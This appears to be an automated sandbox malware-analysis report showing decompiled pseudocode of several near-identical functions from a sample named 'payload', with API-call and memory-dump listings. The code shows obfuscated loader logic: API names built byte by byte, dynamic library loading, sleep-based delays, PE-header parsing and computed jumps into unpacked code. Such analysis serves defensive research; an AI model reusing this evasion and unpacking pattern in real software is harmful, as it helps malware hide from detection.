    				_push(0x4050b3);
    				_push("bkktdsxxkjueaz");
    				if(E00402BB3(_t11) != 0) {
    					L6:
    					_push(1);
    					 *_t49 =  *_t49 - 1;
    					_push("vwzhywkzcohliu");
    					_push("oledcrpjmksdjf"); // executed
    					_t13 = E00401CAE(_t12); // executed
    					__eflags = _t13;
    					if(_t13 != 0) {
    						L18:
    						L19:
    						goto L19;
    					}
    					__eflags = _t47 - 0xfd00;
    					if(_t47 < 0xfd00) {
    						goto L18;
    					}
    					 *0x305061 = 0x6b;
    					 *0x00305062 = 0x65;
    					 *0x00305063 = 0x72;
    					 *0x00305064 = 0x6e;
    					 *0x00305065 = 0x65;
    					 *0x00305066 = 0x6c;
    					 *0x00305067 = 0x33;
    					_t17 = LoadLibraryA("kernel32.dll");
    					 *0x40500e = _t17;
    					_t37 = "pejpCreate";
    					 *_t37 = 0x70616548;
    					 *((short*)(_t37 + 4)) = 0x7243;
    					 *((short*)(_t37 + 6)) = 0x6165;
    					_push(_t37);
    					_push(_t17);
    					_push(__imp__LoadLibraryExW);
    					_pop( *0x40500a);
    					_push(_t17);
    					_push(1);
    					 *_t49 =  *_t49 - 1;
    					_push("vwzhywkzcohliu");
    					_push("oledcrpjmksdjf"); // executed
    					_t18 = E00401CAE(_t17); // executed
    					__eflags = _t18;
    					if(_t18 != 0) {
    						goto L18;
    					}
    					L"oidsapi.dll" = 0x6e;
    					M00405038 = 0x74;
    					_t21 = LoadLibraryExW( &((L"")[1]), 0, 0);
    					 *((intOrPtr*)(_t47 - 4)) = _t21;
    					_push(_t21);
    					__eflags = _t21;
    					if(_t21 == 0) {
    						goto L18;
    					}
    					_push("zzdjjqpqaxlgt"); // executed
    					_t22 = E00402E18(_t21); // executed
    					_push("true");
    					 *_t49 =  *_t49 - 1;
    					_push(0x4050b3);
    					_push("bkktdsxxkjueaz"); // executed
    					_t23 = E00402BB3(_t22); // executed
    					__eflags = _t23;
    					if(_t23 != 0) {
    						goto L18;
    					}
    					_push(0x1e);
    					do {
    						_t25 = WaitForSingleObject(0xffffffff, 1); // executed
    						 *_t49 =  *_t49 - 1;
    						__eflags =  *_t49;
    					} while ( *_t49 != 0);
    					 *0x40501a = 0;
    					_push("zzdjjqpqaxlgt"); // executed
    					E00402E18(_t25); // executed
    					_pop(_t41);
    					 *((intOrPtr*)(_t49 + 4)) =  *((intOrPtr*)(_t49 + 4)) +  *((intOrPtr*)(_t41 + 0x3c));
    					_t45 = _t41;
    					 *0x405002 = _t45 + 0xa4;
    					_t27 =  *0x405002;
    					_t28 =  *_t27;
    					 *0x405002 = _t28;
    					__eflags =  *0x405002 - 0xfff;
    					if(__eflags > 0) {
    						goto L18;
    					}
    					asm("sbb dword [ecx], 0xa0");
    					if(__eflags < 0) {
    						goto L18;
    					}
    					 *0x405016 = GetProcAddress();
    					LoadLibraryA("kernel32.dll");
    					 *0x40501a = E004019C6;
    					_push(E00402749);
    					_pop(_t33);
    					 *0x40501a =  *0x40501a + _t33;
    					__eflags =  *((intOrPtr*)(_t47 - 4)) - 0xffffffff;
    					if( *((intOrPtr*)(_t47 - 4)) != 0xffffffff) {
    						 *0x40501a =  *0x40501a - E00402749;
    						goto __eax;
    					}
    					 *0x40501a =  *0x40501a ^ E004019C6;
    					goto __eax;
    				}
    				_push(1);
    				 *_t49 =  *_t49 - 1;
    				_push("vwzhywkzcohliu");
    				_push("oledcrpjmksdjf");
    				if(_t12 != 0) {
    					goto L6;
    				}
    				_push(0xf);
    				 *_t49 =  *_t49 - 1;
    				_push(0x4050b3);
    				_push("bkktdsxxkjueaz");
    				if(_t12 != 0) {
    					goto L6;
    				}
    				_push(1);
    				 *_t49 =  *_t49 - 1;
    				_push("vwzhywkzcohliu");
    				_push("oledcrpjmksdjf");
    				if(_t12 != 0) {
    					goto L6;
    				}
    				_push(0xf);
    				 *_t49 =  *_t49 - 1;
    				_push(0x4050b3);
    				_push("bkktdsxxkjueaz");
    				if(_t12 != 0) {
    					goto L6;
    				}
    				_push(E00402749);
    				return E00402749;
    			}

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    C-Code - Quality: 47%
    			E00402868() {
    				void* _t11;
    				void* _t13;
    				struct HINSTANCE__* _t17;
    				void* _t18;
    				struct HINSTANCE__* _t21;
    				void* _t22;
    				void* _t23;
    				long _t25;
    				intOrPtr* _t27;
    				intOrPtr _t28;
    				void* _t33;
    				intOrPtr* _t36;
    				void* _t40;
    				void* _t44;
    				void* _t46;
    				intOrPtr* _t48;
    				void* _t58;
    
    				_push(0xf);
    				 *_t48 =  *_t48 - 1;
    				_push(0x4050b3);
    				_push("bkktdsxxkjueaz");
    				if(E00402BB3(_t11) != 0) {
    					L1:
    					_push(1);
    					 *_t48 =  *_t48 - 1;
    					_push("vwzhywkzcohliu");
    					_push("oledcrpjmksdjf"); // executed
    					_t13 = E00401CAE(_t12); // executed
    					if(_t13 != 0 || _t46 < 0xfd00) {
    						L13:
    						L14:
    						goto L14;
    					} else {
    						 *0x305061 = 0x6b;
    						 *0x00305062 = 0x65;
    						 *0x00305063 = 0x72;
    						 *0x00305064 = 0x6e;
    						 *0x00305065 = 0x65;
    						 *0x00305066 = 0x6c;
    						 *0x00305067 = 0x33;
    						_t17 = LoadLibraryA("kernel32.dll");
    						 *0x40500e = _t17;
    						_t36 = "pejpCreate";
    						 *_t36 = 0x70616548;
    						 *((short*)(_t36 + 4)) = 0x7243;
    						 *((short*)(_t36 + 6)) = 0x6165;
    						_push(_t36);
    						_push(_t17);
    						_push(__imp__LoadLibraryExW);
    						_pop( *0x40500a);
    						_push(_t17);
    						_push(1);
    						 *_t48 =  *_t48 - 1;
    						_push("vwzhywkzcohliu");
    						_push("oledcrpjmksdjf"); // executed
    						_t18 = E00401CAE(_t17); // executed
    						if(_t18 != 0) {
    							goto L13;
    						}
    						L"oidsapi.dll" = 0x6e;
    						M00405038 = 0x74;
    						_t21 = LoadLibraryExW( &((L"")[1]), 0, 0);
    						 *((intOrPtr*)(_t46 - 4)) = _t21;
    						_push(_t21);
    						if(_t21 == 0) {
    							goto L13;
    						}
    						_push("zzdjjqpqaxlgt"); // executed
    						_t22 = E00402E18(_t21); // executed
    						_push("true");
    						 *_t48 =  *_t48 - 1;
    						_push(0x4050b3);
    						_push("bkktdsxxkjueaz"); // executed
    						_t23 = E00402BB3(_t22); // executed
    						if(_t23 != 0) {
    							goto L13;
    						}
    						_push(0x1e);
    						do {
    							_t25 = WaitForSingleObject(0xffffffff, 1); // executed
    							 *_t48 =  *_t48 - 1;
    						} while ( *_t48 != 0);
    						 *0x40501a = 0;
    						_push("zzdjjqpqaxlgt"); // executed
    						E00402E18(_t25); // executed
    						_pop(_t40);
    						 *((intOrPtr*)(_t48 + 4)) =  *((intOrPtr*)(_t48 + 4)) +  *((intOrPtr*)(_t40 + 0x3c));
    						_t44 = _t40;
    						 *0x405002 = _t44 + 0xa4;
    						_t27 =  *0x405002;
    						_t28 =  *_t27;
    						 *0x405002 = _t28;
    						_t58 =  *0x405002 - 0xfff;
    						if(_t58 > 0) {
    							goto L13;
    						}
    						asm("sbb dword [ecx], 0xa0");
    						if(_t58 < 0) {
    							goto L13;
    						}
    						 *0x405016 = GetProcAddress();
    						LoadLibraryA("kernel32.dll");
    						 *0x40501a = E004019C6;
    						_push(E00402749);
    						_pop(_t33);
    						 *0x40501a =  *0x40501a + _t33;
    						if( *((intOrPtr*)(_t46 - 4)) != 0xffffffff) {
    							 *0x40501a =  *0x40501a - E00402749;
    							goto __eax;
    						}
    						 *0x40501a =  *0x40501a ^ E004019C6;
    						goto __eax;
    					}
    				}
    				_push( *0x4050cf);
    				__eax = E00402AD0(__eax);
    				_push( *0x4050cf);
    				__eax = E00402AD0(__eax);
    				_push(1);
    				 *__esp =  *__esp - 1;
    				_push("vwzhywkzcohliu");
    				_push("oledcrpjmksdjf");
    				__eax = E00401CAE(__eax);
    				if(__eax != 0) {
    					goto L1;
    				}
    				_push(0xf);
    				 *__esp =  *__esp - 1;
    				_push(0x4050b3);
    				_push("bkktdsxxkjueaz");
    				__eax = E00402BB3(__eax);
    				if(__eax != 0) {
    					goto L1;
    				}
    				_push("zzdjjqpqaxlgt");
    				__eax = E00402E18(__eax);
    				_push(1);
    				 *__esp =  *__esp - 1;
    				_push("vwzhywkzcohliu");
    				_push("oledcrpjmksdjf");
    				__eax = E00401CAE(__eax);
    				if(__eax != 0) {
    					goto L1;
    				}
    				__eax = E00401000;
    				_push(E00401000);
    				return E00401000;
    			}

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    C-Code - Quality: 45%
    			E004024DE() {
    				void* _t11;
    				void* _t13;
    				struct HINSTANCE__* _t17;
    				void* _t18;
    				struct HINSTANCE__* _t21;
    				void* _t22;
    				void* _t23;
    				long _t25;
    				intOrPtr* _t27;
    				intOrPtr _t28;
    				void* _t33;
    				signed int _t34;
    				void* _t35;
    				intOrPtr* _t39;
    				void* _t43;
    				void* _t47;
    				void* _t49;
    				intOrPtr* _t51;
    				void* _t60;
    
    				_push(1);
    				 *_t51 =  *_t51 - 1;
    				_push("vwzhywkzcohliu");
    				_push("oledcrpjmksdjf");
    				if(E00401CAE(_t11) != 0) {
    					L1:
    					_push(1);
    					 *_t51 =  *_t51 - 1;
    					_push("vwzhywkzcohliu");
    					_push("oledcrpjmksdjf"); // executed
    					_t13 = E00401CAE(_t12); // executed
    					if(_t13 != 0 || _t49 < 0xfd00) {
    						L17:
    						L18:
    						goto L18;
    					} else {
    						 *0x305061 = 0x6b;
    						 *0x00305062 = 0x65;
    						 *0x00305063 = 0x72;
    						 *0x00305064 = 0x6e;
    						 *0x00305065 = 0x65;
    						 *0x00305066 = 0x6c;
    						 *0x00305067 = 0x33;
    						_t17 = LoadLibraryA("kernel32.dll");
    						 *0x40500e = _t17;
    						_t39 = "pejpCreate";
    						 *_t39 = 0x70616548;
    						 *((short*)(_t39 + 4)) = 0x7243;
    						 *((short*)(_t39 + 6)) = 0x6165;
    						_push(_t39);
    						_push(_t17);
    						_push(__imp__LoadLibraryExW);
    						_pop( *0x40500a);
    						_push(_t17);
    						_push(1);
    						 *_t51 =  *_t51 - 1;
    						_push("vwzhywkzcohliu");
    						_push("oledcrpjmksdjf"); // executed
    						_t18 = E00401CAE(_t17); // executed
    						if(_t18 != 0) {
    							goto L17;
    						}
    						L"oidsapi.dll" = 0x6e;
    						M00405038 = 0x74;
    						_t21 = LoadLibraryExW( &((L"")[1]), 0, 0);
    						 *((intOrPtr*)(_t49 - 4)) = _t21;
    						_push(_t21);
    						if(_t21 == 0) {
    							goto L17;
    						}
    						_push("zzdjjqpqaxlgt"); // executed
    						_t22 = E00402E18(_t21); // executed
    						_push("true");
    						 *_t51 =  *_t51 - 1;
    						_push(0x4050b3);
    						_push("bkktdsxxkjueaz"); // executed
    						_t23 = E00402BB3(_t22); // executed
    						if(_t23 != 0) {
    							goto L17;
    						}
    						_push(0x1e);
    						do {
    							_t25 = WaitForSingleObject(0xffffffff, 1); // executed
    							 *_t51 =  *_t51 - 1;
    						} while ( *_t51 != 0);
    						_t51 = _t51 + 4;
    						 *0x40501a = 0;
    						_push("zzdjjqpqaxlgt"); // executed
    						E00402E18(_t25); // executed
    						_pop(_t43);
    						 *_t51 =  *_t51 +  *((intOrPtr*)(_t43 + 0x3c));
    						_t47 = _t43;
    						 *0x405002 = _t47 + 0xa4;
    						_t27 =  *0x405002;
    						_t28 =  *_t27;
    						 *0x405002 = _t28;
    						_t60 =  *0x405002 - 0xfff;
    						if(_t60 > 0) {
    							goto L17;
    						}
    						asm("sbb dword [ecx], 0xa0");
    						if(_t60 < 0) {
    							goto L17;
    						}
    						 *0x405016 = GetProcAddress();
    						LoadLibraryA("kernel32.dll");
    						 *0x40501a = E004019C6;
    						_push(E00402749);
    						_pop(_t33);
    						 *0x40501a =  *0x40501a + _t33;
    						if( *((intOrPtr*)(_t49 - 4)) != 0xffffffff) {
    							 *0x40501a =  *0x40501a - E00402749;
    							_t34 =  *0x40501a; // 0x0
    							goto __eax;
    						}
    						 *0x40501a =  *0x40501a ^ E004019C6;
    						goto __eax;
    					}
    				}
    				_push(1);
    				 *_t51 =  *_t51 - 1;
    				_push("vwzhywkzcohliu");
    				_push("oledcrpjmksdjf");
    				if(E00401CAE(_t34) != 0) {
    					goto L1;
    				}
    				_push(1);
    				 *_t51 =  *_t51 - 1;
    				_push("vwzhywkzcohliu");
    				_push("oledcrpjmksdjf");
    				if(_t12 != 0) {
    					goto L1;
    				}
    				_push( *0x4050cf);
    				_t35 = E00402AD0(_t12);
    				_push(0xf);
    				 *_t51 =  *_t51 - 1;
    				_push(0x4050b3);
    				_push("bkktdsxxkjueaz");
    				if(E00402BB3(_t35) != 0) {
    					goto L1;
    				}
    				_push("zzdjjqpqaxlgt");
    				E00402E18(_t12);
    				_push(E00402749);
    				return E00402749;
    			}

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    C-Code - Quality: 47%
    			E004016FF() {
    				void* _t11;
    				intOrPtr _t13;
    				struct HINSTANCE__* _t17;
    				intOrPtr _t18;
    				struct HINSTANCE__* _t21;
    				void* _t22;
    				intOrPtr _t23;
    				long _t25;
    				intOrPtr* _t27;
    				intOrPtr _t28;
    				void* _t33;
    				void* _t36;
    				intOrPtr* _t38;
    				void* _t42;
    				void* _t46;
    				void* _t48;
    				intOrPtr* _t50;
    
    				_push(0xf);
    				 *_t50 =  *_t50 - 1;
    				_push(0x4050b3);
    				_push("bkktdsxxkjueaz");
    				if(E00402BB3(_t11) != 0) {
    					L5:
    					_push(1);
    					 *_t50 =  *_t50 - 1;
    					_push("vwzhywkzcohliu");
    					_push("oledcrpjmksdjf"); // executed
    					_t13 = E00401CAE(_t12); // executed
    					__eflags = _t13;
    					if(_t13 != 0) {
    						L17:
    						L18:
    						goto L18;
    					}
    					__eflags = _t48 - 0xfd00;
    					if(_t48 < 0xfd00) {
    						goto L17;
    					}
    					 *0x305061 = 0x6b;
    					 *0x00305062 = 0x65;
    					 *0x00305063 = 0x72;
    					 *0x00305064 = 0x6e;
    					 *0x00305065 = 0x65;
    					 *0x00305066 = 0x6c;
    					 *0x00305067 = 0x33;
    					_t17 = LoadLibraryA("kernel32.dll");
    					 *0x40500e = _t17;
    					_t38 = "pejpCreate";
    					 *_t38 = 0x70616548;
    					 *((short*)(_t38 + 4)) = 0x7243;
    					 *((short*)(_t38 + 6)) = 0x6165;
    					_push(_t38);
    					_push(_t17);
    					_push(__imp__LoadLibraryExW);
    					_pop( *0x40500a);
    					_push(_t17);
    					_push(1);
    					 *_t50 =  *_t50 - 1;
    					_push("vwzhywkzcohliu");
    					_push("oledcrpjmksdjf"); // executed
    					_t18 = E00401CAE(_t17); // executed
    					__eflags = _t18;
    					if(_t18 != 0) {
    						goto L17;
    					}
    					L"oidsapi.dll" = 0x6e;
    					M00405038 = 0x74;
    					_t21 = LoadLibraryExW( &((L"")[1]), 0, 0);
    					 *((intOrPtr*)(_t48 - 4)) = _t21;
    					_push(_t21);
    					__eflags = _t21;
    					if(_t21 == 0) {
    						goto L17;
    					}
    					_push("zzdjjqpqaxlgt"); // executed
    					_t22 = E00402E18(_t21); // executed
    					_push("true");
    					 *_t50 =  *_t50 - 1;
    					_push(0x4050b3);
    					_push("bkktdsxxkjueaz"); // executed
    					_t23 = E00402BB3(_t22); // executed
    					__eflags = _t23;
    					if(_t23 != 0) {
    						goto L17;
    					}
    					_push(0x1e);
    					do {
    						_t25 = WaitForSingleObject(0xffffffff, 1); // executed
    						 *_t50 =  *_t50 - 1;
    						__eflags =  *_t50;
    					} while ( *_t50 != 0);
    					 *0x40501a = 0;
    					_push("zzdjjqpqaxlgt"); // executed
    					E00402E18(_t25); // executed
    					_pop(_t42);
    					 *((intOrPtr*)(_t50 + 4)) =  *((intOrPtr*)(_t50 + 4)) +  *((intOrPtr*)(_t42 + 0x3c));
    					_t46 = _t42;
    					 *0x405002 = _t46 + 0xa4;
    					_t27 =  *0x405002;
    					_t28 =  *_t27;
    					 *0x405002 = _t28;
    					__eflags =  *0x405002 - 0xfff;
    					if(__eflags > 0) {
    						goto L17;
    					}
    					asm("sbb dword [ecx], 0xa0");
    					if(__eflags < 0) {
    						goto L17;
    					}
    					 *0x405016 = GetProcAddress();
    					LoadLibraryA("kernel32.dll");
    					 *0x40501a = E004019C6;
    					_push(E00402749);
    					_pop(_t33);
    					 *0x40501a =  *0x40501a + _t33;
    					__eflags =  *((intOrPtr*)(_t48 - 4)) - 0xffffffff;
    					if( *((intOrPtr*)(_t48 - 4)) != 0xffffffff) {
    						 *0x40501a =  *0x40501a - E00402749;
    						goto __eax;
    					}
    					 *0x40501a =  *0x40501a ^ E004019C6;
    					goto __eax;
    				}
    				_push(0xf);
    				 *_t50 =  *_t50 - 1;
    				_push(0x4050b3);
    				_push("bkktdsxxkjueaz");
    				if(_t12 != 0) {
    					goto L5;
    				}
    				_push(1);
    				 *_t50 =  *_t50 - 1;
    				_push("vwzhywkzcohliu");
    				_push("oledcrpjmksdjf");
    				if(_t12 != 0) {
    					goto L5;
    				}
    				_push("zzdjjqpqaxlgt");
    				_t36 = E00402E18(_t12);
    				_push(1);
    				 *_t50 =  *_t50 - 1;
    				_push("vwzhywkzcohliu");
    				_push("oledcrpjmksdjf");
    				if(E00401CAE(_t36) != 0) {
    					goto L5;
    				}
    				_push(0x402b5c);
    				return 0x402b5c;
    			}

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    C-Code - Quality: 47%
    			E00401784() {
    				void* _t11;
    				intOrPtr _t13;
    				struct HINSTANCE__* _t17;
    				intOrPtr _t18;
    				struct HINSTANCE__* _t21;
    				void* _t22;
    				intOrPtr _t23;
    				long _t25;
    				intOrPtr* _t27;
    				intOrPtr _t28;
    				void* _t33;
    				void* _t36;
    				intOrPtr* _t38;
    				void* _t42;
    				void* _t46;
    				void* _t48;
    				intOrPtr* _t50;
    
    				_push(1);
    				 *_t50 =  *_t50 - 1;
    				_push("vwzhywkzcohliu");
    				_push("oledcrpjmksdjf");
    				if(E00401CAE(_t11) != 0) {
    					L5:
    					_push(1);
    					 *_t50 =  *_t50 - 1;
    					_push("vwzhywkzcohliu");
    					_push("oledcrpjmksdjf"); // executed
    					_t13 = E00401CAE(_t12); // executed
    					__eflags = _t13;
    					if(_t13 != 0) {
    						L17:
    						L18:
    						goto L18;
    					}
    					__eflags = _t48 - 0xfd00;
    					if(_t48 < 0xfd00) {
    						goto L17;
    					}
    					 *0x305061 = 0x6b;
    					 *0x00305062 = 0x65;
    					 *0x00305063 = 0x72;
    					 *0x00305064 = 0x6e;
    					 *0x00305065 = 0x65;
    					 *0x00305066 = 0x6c;
    					 *0x00305067 = 0x33;
    					_t17 = LoadLibraryA("kernel32.dll");
    					 *0x40500e = _t17;
    					_t38 = "pejpCreate";
    					 *_t38 = 0x70616548;
    					 *((short*)(_t38 + 4)) = 0x7243;
    					 *((short*)(_t38 + 6)) = 0x6165;
    					_push(_t38);
    					_push(_t17);
    					_push(__imp__LoadLibraryExW);
    					_pop( *0x40500a);
    					_push(_t17);
    					_push(1);
    					 *_t50 =  *_t50 - 1;
    					_push("vwzhywkzcohliu");
    					_push("oledcrpjmksdjf"); // executed
    					_t18 = E00401CAE(_t17); // executed
    					__eflags = _t18;
    					if(_t18 != 0) {
    						goto L17;
    					}
    					L"oidsapi.dll" = 0x6e;
    					M00405038 = 0x74;
    					_t21 = LoadLibraryExW( &((L"")[1]), 0, 0);
    					 *((intOrPtr*)(_t48 - 4)) = _t21;
    					_push(_t21);
    					__eflags = _t21;
    					if(_t21 == 0) {
    						goto L17;
    					}
    					_push("zzdjjqpqaxlgt"); // executed
    					_t22 = E00402E18(_t21); // executed
    					_push("true");
    					 *_t50 =  *_t50 - 1;
    					_push(0x4050b3);
    					_push("bkktdsxxkjueaz"); // executed
    					_t23 = E00402BB3(_t22); // executed
    					__eflags = _t23;
    					if(_t23 != 0) {
    						goto L17;
    					}
    					_push(0x1e);
    					do {
    						_t25 = WaitForSingleObject(0xffffffff, 1); // executed
    						 *_t50 =  *_t50 - 1;
    						__eflags =  *_t50;
    					} while ( *_t50 != 0);
    					 *0x40501a = 0;
    					_push("zzdjjqpqaxlgt"); // executed
    					E00402E18(_t25); // executed
    					_pop(_t42);
    					 *((intOrPtr*)(_t50 + 4)) =  *((intOrPtr*)(_t50 + 4)) +  *((intOrPtr*)(_t42 + 0x3c));
    					_t46 = _t42;
    					 *0x405002 = _t46 + 0xa4;
    					_t27 =  *0x405002;
    					_t28 =  *_t27;
    					 *0x405002 = _t28;
    					__eflags =  *0x405002 - 0xfff;
    					if(__eflags > 0) {
    						goto L17;
    					}
    					asm("sbb dword [ecx], 0xa0");
    					if(__eflags < 0) {
    						goto L17;
    					}
    					 *0x405016 = GetProcAddress();
    					LoadLibraryA("kernel32.dll");
    					 *0x40501a = E004019C6;
    					_push(E00402749);
    					_pop(_t33);
    					 *0x40501a =  *0x40501a + _t33;
    					__eflags =  *((intOrPtr*)(_t48 - 4)) - 0xffffffff;
    					if( *((intOrPtr*)(_t48 - 4)) != 0xffffffff) {
    						 *0x40501a =  *0x40501a - E00402749;
    						goto __eax;
    					}
    					 *0x40501a =  *0x40501a ^ E004019C6;
    					goto __eax;
    				}
    				_push( *0x4050cf);
    				_t36 = E00402AD0(_t12);
    				_push(0xf);
    				 *_t50 =  *_t50 - 1;
    				_push(0x4050b3);
    				_push("bkktdsxxkjueaz");
    				if(E00402BB3(_t36) != 0) {
    					goto L5;
    				}
    				_push(0xf);
    				 *_t50 =  *_t50 - 1;
    				_push(0x4050b3);
    				_push("bkktdsxxkjueaz");
    				if(_t12 != 0) {
    					goto L5;
    				}
    				_push(0xf);
    				 *_t50 =  *_t50 - 1;
    				_push(0x4050b3);
    				_push("bkktdsxxkjueaz");
    				if(_t12 != 0) {
    					goto L5;
    				}
    				_push(E004011B7);
    				return E004011B7;
    			}

    0x00401784
    0x00401786
    0x00401789
    0x0040178e
    0x0040179b
    0x00401e1e
    0x00401e1e
    0x00401e20
    0x00401e23
    0x00401e28
    0x00401e2d
    0x00401e32
    0x00401e34
    0x00402749
    0x0040274c
    0x00000000
    0x0040274c
    0x00401e40
    0x00401e45
    0x00000000
    0x00000000
    0x00401e50
    0x00401e53
    0x00401e57
    0x00401e5b
    0x00401e5f
    0x00401e63
    0x00401e67
    0x00401e72
    0x00401e75
    0x00401e7b
    0x00401e81
    0x00401e87
    0x00401e8d
    0x00401e93
    0x00401e94
    0x00401e95
    0x00401e9b
    0x00401ea1
    0x00401ea2
    0x00401ea4
    0x00401ea7
    0x00401eac
    0x00401eb1
    0x00401eb6
    0x00401eb9
    0x00000000
    0x00000000
    0x00401ec0
    0x00401ec7
    0x00401ee0
    0x00401ee2
    0x00401ee5
    0x00401ee6
    0x00401ee8
    0x00000000
    0x00000000
    0x00401eee
    0x00401ef3
    0x00401ef8
    0x00401efa
    0x00401efd
    0x00401f02
    0x00401f07
    0x00401f0c
    0x00401f0e
    0x00000000
    0x00000000
    0x00401f14
    0x00401f16
    0x00401f1f
    0x00401f21
    0x00401f21
    0x00401f21
    0x00401f2a
    0x00401f31
    0x00401f36
    0x00401f3b
    0x00401f43
    0x00401f46
    0x00401f4d
    0x00401f59
    0x00401f5c
    0x00401f5d
    0x00401f67
    0x00401f6d
    0x00000000
    0x00000000
    0x00401f73
    0x00401f79
    0x00000000
    0x00000000
    0x00401f88
    0x00401f98
    0x00401f9a
    0x00401fa4
    0x00401fa9
    0x00401faa
    0x00401fb0
    0x00401fb7
    0x00401fca
    0x00401fd9
    0x00401fd9
    0x00401fb9
    0x00401fc8
    0x00401fc8
    0x004017a1
    0x004017a7
    0x004017ac
    0x004017ae
    0x004017b1
    0x004017b6
    0x004017c2
    0x00000000
    0x00000000
    0x004017c8
    0x004017ca
    0x004017cd
    0x004017d2
    0x004017df
    0x00000000
    0x00000000
    0x004017e5
    0x004017e7
    0x004017ea
    0x004017ef
    0x004017fc
    0x00000000
    0x00000000
    0x00401808
    0x00401809

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    C-Code - Quality: 47%
    			E0040193D() {
    				void* _t11;
    				intOrPtr _t13;
    				struct HINSTANCE__* _t17;
    				intOrPtr _t18;
    				struct HINSTANCE__* _t21;
    				void* _t22;
    				intOrPtr _t23;
    				long _t25;
    				intOrPtr* _t27;
    				intOrPtr _t28;
    				void* _t33;
    				void* _t36;
    				intOrPtr* _t38;
    				void* _t42;
    				void* _t46;
    				void* _t48;
    				intOrPtr* _t50;
    
    				_push(0xf);
    				 *_t50 =  *_t50 - 1;
    				_push(0x4050b3);
    				_push("bkktdsxxkjueaz");
    				if(E00402BB3(_t11) != 0) {
    					L5:
    					_push(1);
    					 *_t50 =  *_t50 - 1;
    					_push("vwzhywkzcohliu");
    					_push("oledcrpjmksdjf"); // executed
    					_t13 = E00401CAE(_t12); // executed
    					__eflags = _t13;
    					if(_t13 != 0) {
    						L17:
    						L18:
    						goto L18;
    					}
    					__eflags = _t48 - 0xfd00;
    					if(_t48 < 0xfd00) {
    						goto L17;
    					}
    					 *0x305061 = 0x6b;
    					 *0x00305062 = 0x65;
    					 *0x00305063 = 0x72;
    					 *0x00305064 = 0x6e;
    					 *0x00305065 = 0x65;
    					 *0x00305066 = 0x6c;
    					 *0x00305067 = 0x33;
    					_t17 = LoadLibraryA("kernel32.dll");
    					 *0x40500e = _t17;
    					_t38 = "pejpCreate";
    					 *_t38 = 0x70616548;
    					 *((short*)(_t38 + 4)) = 0x7243;
    					 *((short*)(_t38 + 6)) = 0x6165;
    					_push(_t38);
    					_push(_t17);
    					_push(__imp__LoadLibraryExW);
    					_pop( *0x40500a);
    					_push(_t17);
    					_push(1);
    					 *_t50 =  *_t50 - 1;
    					_push("vwzhywkzcohliu");
    					_push("oledcrpjmksdjf"); // executed
    					_t18 = E00401CAE(_t17); // executed
    					__eflags = _t18;
    					if(_t18 != 0) {
    						goto L17;
    					}
    					L"oidsapi.dll" = 0x6e;
    					M00405038 = 0x74;
    					_t21 = LoadLibraryExW( &((L"")[1]), 0, 0);
    					 *((intOrPtr*)(_t48 - 4)) = _t21;
    					_push(_t21);
    					__eflags = _t21;
    					if(_t21 == 0) {
    						goto L17;
    					}
    					_push("zzdjjqpqaxlgt"); // executed
    					_t22 = E00402E18(_t21); // executed
    					_push("true");
    					 *_t50 =  *_t50 - 1;
    					_push(0x4050b3);
    					_push("bkktdsxxkjueaz"); // executed
    					_t23 = E00402BB3(_t22); // executed
    					__eflags = _t23;
    					if(_t23 != 0) {
    						goto L17;
    					}
    					_push(0x1e);
    					do {
    						_t25 = WaitForSingleObject(0xffffffff, 1); // executed
    						 *_t50 =  *_t50 - 1;
    						__eflags =  *_t50;
    					} while ( *_t50 != 0);
    					 *0x40501a = 0;
    					_push("zzdjjqpqaxlgt"); // executed
    					E00402E18(_t25); // executed
    					_pop(_t42);
    					 *((intOrPtr*)(_t50 + 4)) =  *((intOrPtr*)(_t50 + 4)) +  *((intOrPtr*)(_t42 + 0x3c));
    					_t46 = _t42;
    					 *0x405002 = _t46 + 0xa4;
    					_t27 =  *0x405002;
    					_t28 =  *_t27;
    					 *0x405002 = _t28;
    					__eflags =  *0x405002 - 0xfff;
    					if(__eflags > 0) {
    						goto L17;
    					}
